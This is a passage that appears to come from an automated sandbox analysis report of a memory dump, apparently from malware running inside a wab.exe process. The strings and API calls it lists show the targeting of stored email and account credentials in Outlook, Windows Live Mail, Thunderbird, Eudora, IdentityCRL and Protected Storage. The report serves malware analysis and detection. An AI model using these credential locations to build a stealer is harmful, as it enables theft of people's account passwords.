calls 33826 424c6d 15 API calls __fprintf_l 34003 426741 19 API calls 33828 440c70 17 API calls 33829 443c71 44 API calls 33832 427c79 24 API calls 34006 416e7e memset __fprintf_l 33836 42800b 47 API calls 33837 425115 82 API calls __fprintf_l 34009 41960c 61 API calls 33838 43f40c 122 API calls __fprintf_l 33841 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33842 43f81a 20 API calls 33844 414c20 memset memset 33845 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34013 414625 18 API calls 34014 404225 modf 34015 403a26 strlen WriteFile 34017 40422a 12 API calls 34021 427632 memset memset memcpy 34022 40ca30 59 API calls 32903 44b435 VirtualProtect 32904 44b444 VirtualProtect 32903->32904 32905 44b454 32903->32905 32904->32905 34023 404235 26 API calls 33847 425115 76 API calls __fprintf_l 34024 425115 77 API calls __fprintf_l 34026 44223a 38 API calls 33853 43183c 112 API calls 34027 44b2c5 _onexit __dllonexit 34032 42a6d2 memcpy __allrem 33855 405cda 65 API calls 34040 43fedc 138 API calls 34041 4116e1 16 API calls __fprintf_l 33858 4244e6 19 API calls 33860 42e8e8 127 API calls __fprintf_l 33861 4118ee RtlLeaveCriticalSection 34046 43f6ec 22 API calls 33863 425115 119 API calls __fprintf_l 32906 410cf3 EnumResourceNamesA 34049 4492f0 memcpy memcpy 34051 43fafa 18 API calls 34053 4342f9 15 API calls __fprintf_l 33864 4144fd 19 API calls 34055 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34056 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34059 443a84 _mbscpy 34061 43f681 17 API calls 33867 404487 22 API calls 34063 415e8c 16 API calls __fprintf_l 33871 411893 RtlDeleteCriticalSection __fprintf_l 33872 41a492 42 API calls 34067 403e96 34 API calls 34068 410e98 memset SHGetPathFromIDList SendMessageA 33874 426741 109 API calls __fprintf_l 33875 4344a2 18 API calls 33876 4094a2 10 API calls 34071 4116a6 15 API calls __fprintf_l 34072 43f6a4 17 API calls 34073 440aa3 20 API calls 34075 427430 45 API calls 33879 4090b0 7 API calls 33880 4148b0 15 API calls 33882 4118b4 RtlEnterCriticalSection 33883 4014b7 CreateWindowExA 33884 40c8b8 19 API calls 33886 4118bf RtlTryEnterCriticalSection 34080 42434a 18 API calls __fprintf_l 34082 405f53 12 API calls 33894 43f956 59 API calls 33896 40955a 17 API calls 33897 428561 36 API calls 33898 409164 7 API calls 34086 404366 19 API calls 34090 40176c ExitProcess 34093 410777 42 API calls 33903 40dd7b 51 API calls 33904 425d7c 16 API calls __fprintf_l 34095 43f6f0 25 API calls 34096 42db01 22 API calls 33905 412905 15 API calls __fprintf_l 34097 403b04 54 API calls 34098 405f04 SetDlgItemTextA GetDlgItemTextA 34099 44b301 ??3@YAXPAX 34102 4120ea 14 API calls 3 library calls 34103 40bb0a 8 API calls 34105 413f11 strcmp 33909 434110 17 API calls __fprintf_l 33911 425115 108 API calls __fprintf_l 34106 444b11 _onexit 33913 425115 76 API calls __fprintf_l 33916 429d19 10 API calls 34109 444b1f __dllonexit 34110 409f20 _strcmpi 33918 42b927 31 API calls 34113 433f26 19 API calls __fprintf_l 34114 44b323 FreeLibrary 34115 427f25 46 API calls 34116 43ff2b 17 API calls 34117 43fb30 19 API calls 33925 414d36 16 API calls 33927 40ad38 7 API calls 34119 433b38 16 API calls __fprintf_l 34120 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 33931 426741 21 API calls 33932 40c5c3 125 API calls 33934 43fdc5 17 API calls 34121 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33937 4161cb memcpy memcpy memcpy memcpy 34126 43ffc8 18 API calls 33938 4281cc 15 API calls __fprintf_l 34128 4383cc 110 API calls __fprintf_l 33939 4275d3 41 API calls 34129 4153d3 22 API calls __fprintf_l 33940 444dd7 _XcptFilter 34134 4013de 15 API calls 34136 425115 111 API calls __fprintf_l 34137 43f7db 18 API calls 34140 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33943 4335ee 16 API calls __fprintf_l 34142 429fef 11 API calls 33944 444deb _exit _c_exit 34143 40bbf0 138 API calls 33947 425115 79 API calls __fprintf_l 34147 437ffa 22 API calls 33951 4021ff 14 API calls 33952 43f5fc 149 API calls 34148 40e381 9 API calls 33954 405983 40 API calls 33955 42b186 27 API calls __fprintf_l 33956 427d86 76 API calls 33957 403585 20 API calls 33959 42e58e 18 API calls __fprintf_l 33962 425115 75 API calls __fprintf_l 33964 401592 8 API calls 32907 410b92 32910 410a6b 32907->32910 32909 410bb2 32911 410a77 32910->32911 32912 410a89 GetPrivateProfileIntA 32910->32912 32915 410983 memset _itoa WritePrivateProfileStringA 32911->32915 32912->32909 32914 410a84 32914->32909 32915->32914 34152 434395 16 API calls 33966 441d9c memcmp 34154 43f79b 119 API calls 33967 40c599 43 API calls 34155 426741 87 API calls 33971 4401a6 21 API calls 33973 426da6 memcpy memset memset memcpy 33974 4335a5 15 API calls 33976 4299ab memset memset memcpy memset memset 33977 40b1ab 8 API calls 34160 425115 76 API calls __fprintf_l 34164 4113b2 18 API calls 2 library calls 34168 40a3b8 memset sprintf SendMessageA 32921 410bbc 32924 4109cf 32921->32924 32925 4109dc 32924->32925 32926 410a23 memset GetPrivateProfileStringA 32925->32926 32927 4109ea memset 32925->32927 32932 407646 strlen 32926->32932 32937 4075cd sprintf memcpy 32927->32937 32930 410a0c WritePrivateProfileStringA 32931 410a65 32930->32931 32933 40765a 32932->32933 32935 40765c 32932->32935 32933->32931 32934 4076a3 32934->32931 32935->32934 32938 40737c strtoul 32935->32938 32937->32930 32938->32935 33979 40b5bf memset memset _mbsicmp

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040832F
                                                                                            • memset.MSVCRT ref: 00408343
                                                                                            • memset.MSVCRT ref: 0040835F
                                                                                            • memset.MSVCRT ref: 00408376
                                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                            • strlen.MSVCRT ref: 004083E9
                                                                                            • strlen.MSVCRT ref: 004083F8
                                                                                            • memcpy.MSVCRT ref: 0040840A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                            • String ID: 5$H$O$b$i$}$}
                                                                                            • API String ID: 1832431107-3760989150
                                                                                            • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                            • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                            • strlen.MSVCRT ref: 00407F5C
                                                                                            • strlen.MSVCRT ref: 00407F64
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindstrlen$FirstNext
                                                                                            • String ID: ACD
                                                                                            • API String ID: 379999529-620537770
                                                                                            • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                            • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00401E8B
                                                                                            • strlen.MSVCRT ref: 00401EA4
                                                                                            • strlen.MSVCRT ref: 00401EB2
                                                                                            • strlen.MSVCRT ref: 00401EF8
                                                                                            • strlen.MSVCRT ref: 00401F06
                                                                                            • memset.MSVCRT ref: 00401FB1
                                                                                            • atoi.MSVCRT ref: 00401FE0
                                                                                            • memset.MSVCRT ref: 00402003
                                                                                            • sprintf.MSVCRT ref: 00402030
                                                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                            • memset.MSVCRT ref: 00402086
                                                                                            • memset.MSVCRT ref: 0040209B
                                                                                            • strlen.MSVCRT ref: 004020A1
                                                                                            • strlen.MSVCRT ref: 004020AF
                                                                                            • strlen.MSVCRT ref: 004020E2
                                                                                            • strlen.MSVCRT ref: 004020F0
                                                                                            • memset.MSVCRT ref: 00402018
                                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                            • _mbscpy.MSVCRT ref: 00402177
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                            • API String ID: 1846531875-4223776976
                                                                                            • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                            • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                            • API String ID: 745651260-375988210
                                                                                            • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                            • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                            • _mbscpy.MSVCRT ref: 00403E54
                                                                                            Strings
                                                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                            • pstorec.dll, xrefs: 00403C30
                                                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                            • API String ID: 1197458902-317895162
                                                                                            • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                            • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                                                                            APIs
                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                            • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                            • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                            • memcpy.MSVCRT ref: 0040FBE4
                                                                                            • memcpy.MSVCRT ref: 0040FBF9
                                                                                              • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                              • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                              • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                              • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                            • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                            • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                            • API String ID: 2768085393-2409096184
                                                                                            • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                            • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                            • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                            • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 256 444c80-444c85 254->256 257 444c9f-444ca3 254->257 264 444d02-444d0d __setusermatherr 255->264 265 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->265 256->252 259 444c8c-444c93 256->259 257->252 260 444ca5-444ca7 257->260 259->252 262 444c95-444c9d 259->262 263 444cad-444cb0 260->263 262->263 263->255 264->265 268 444da4-444da7 265->268 269 444d6a-444d72 265->269 272 444d81-444d85 268->272 273 444da9-444dad 268->273 270 444d74-444d76 269->270 271 444d78-444d7b 269->271 270->269 270->271 271->272 274 444d7d-444d7e 271->274 275 444d87-444d89 272->275 276 444d8b-444d9c GetStartupInfoA 272->276 273->268 274->272 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                            • String ID:
                                                                                            • API String ID: 3662548030-0
                                                                                            • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                            • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                            • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                            • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0044430B
                                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                              • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                                                            • memset.MSVCRT ref: 00444379
                                                                                            • memset.MSVCRT ref: 00444394
                                                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                            • strlen.MSVCRT ref: 004443DB
                                                                                            • _strcmpi.MSVCRT ref: 00444401
                                                                                            Strings
                                                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                            • Store Root, xrefs: 004443A5
                                                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                            • API String ID: 832325562-2578778931
                                                                                            • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                            • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 323 40f67f-40f6bf call 4012ee RegQueryValueExA 321->323 323->315 328 40f6c1-40f6cf 323->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040F567
                                                                                            • memset.MSVCRT ref: 0040F57F
                                                                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                            • memcpy.MSVCRT ref: 0040F652
                                                                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 2012582556-3916222277
                                                                                            • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                            • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004037EB
                                                                                            • memset.MSVCRT ref: 004037FF
                                                                                              • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                              • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                            • strchr.MSVCRT ref: 0040386E
                                                                                            • _mbscpy.MSVCRT ref: 0040388B
